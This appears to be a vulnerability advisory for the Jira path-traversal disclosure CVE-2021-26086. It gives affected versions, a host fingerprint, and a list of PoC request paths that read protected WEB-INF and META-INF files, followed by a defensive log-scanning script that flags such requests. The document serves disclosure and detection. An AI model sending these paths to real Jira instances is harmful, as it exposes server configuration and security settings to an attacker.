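Atlassian Jira Sensitive Information Disclosure CVE-2021-26086
Vulnerability Description
Jira is a project and issue tracking tool from Atlassian, widely used for defect tracking, customer service, requirements gathering, process approval, task tracking, project tracking and agile management.
Reference links:
Affected Versions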
version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1
Network Mapping
app="ATLASSIAN-JIRA"
Vulnerability Reproduction
PoC:
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
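
Detection example (added here, not part of the original page or of any Atlassian tooling): a log triage script that flags requests shaped like the PoC paths above and reports whether the server answered 200. It assumes combined-format access logs and generalizes beyond the `/s/cfx/_/` prefix to any `;` path segment placed directly before `WEB-INF` or `META-INF`; the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Oct/2021:10:01:02 +0000] "GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1" 200 5312 "-" "curl/7.68.0"
198.51.100.7 - - [12/Oct/2021:10:01:03 +0000] "GET /s/cfx/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.9 - - [12/Oct/2021:10:02:00 +0000] "GET /s/d41d8/_/download/resources/app.js HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Oct/2021:10:02:05 +0000] "GET /secure/Dashboard.jspa?selectPageId=10000 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Oct/2021:10:03:00 +0000] "GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1" 403 0 "-" "curl/7.68.0"
"""

# client, method, request target, status from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# A ";" path-parameter segment directly followed by a protected webapp directory.
PROBE_RE = re.compile(r'/;[^/]*/(?:WEB-INF|META-INF)/', re.IGNORECASE)


def find_probes(log_text):
    """Return (client, decoded_path, status, served) for each matching request.

    served is True when the status is 200, i.e. the file content was
    probably returned and the instance should be treated as exposed.
    """
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, _method, target, status = m.groups()
        # Drop the query string, then normalize percent-encoding, because
        # some front ends log the ";" as %3B.
        path = unquote(target.split("?", 1)[0])
        if PROBE_RE.search(path):
            hits.append((client, path, int(status), status == "200"))
    return hits


if __name__ == "__main__":
    for client, path, status, served in find_probes(SAMPLE_LOG):
        verdict = "FILE SERVED" if served else "not served"
        print(f"{client} {status} {verdict} {path}")
```

A hit with status 200 on an instance in the affected version ranges listed above means the requested file was likely disclosed; files such as `seraph-config.xml` should then be reviewed for what they reveal.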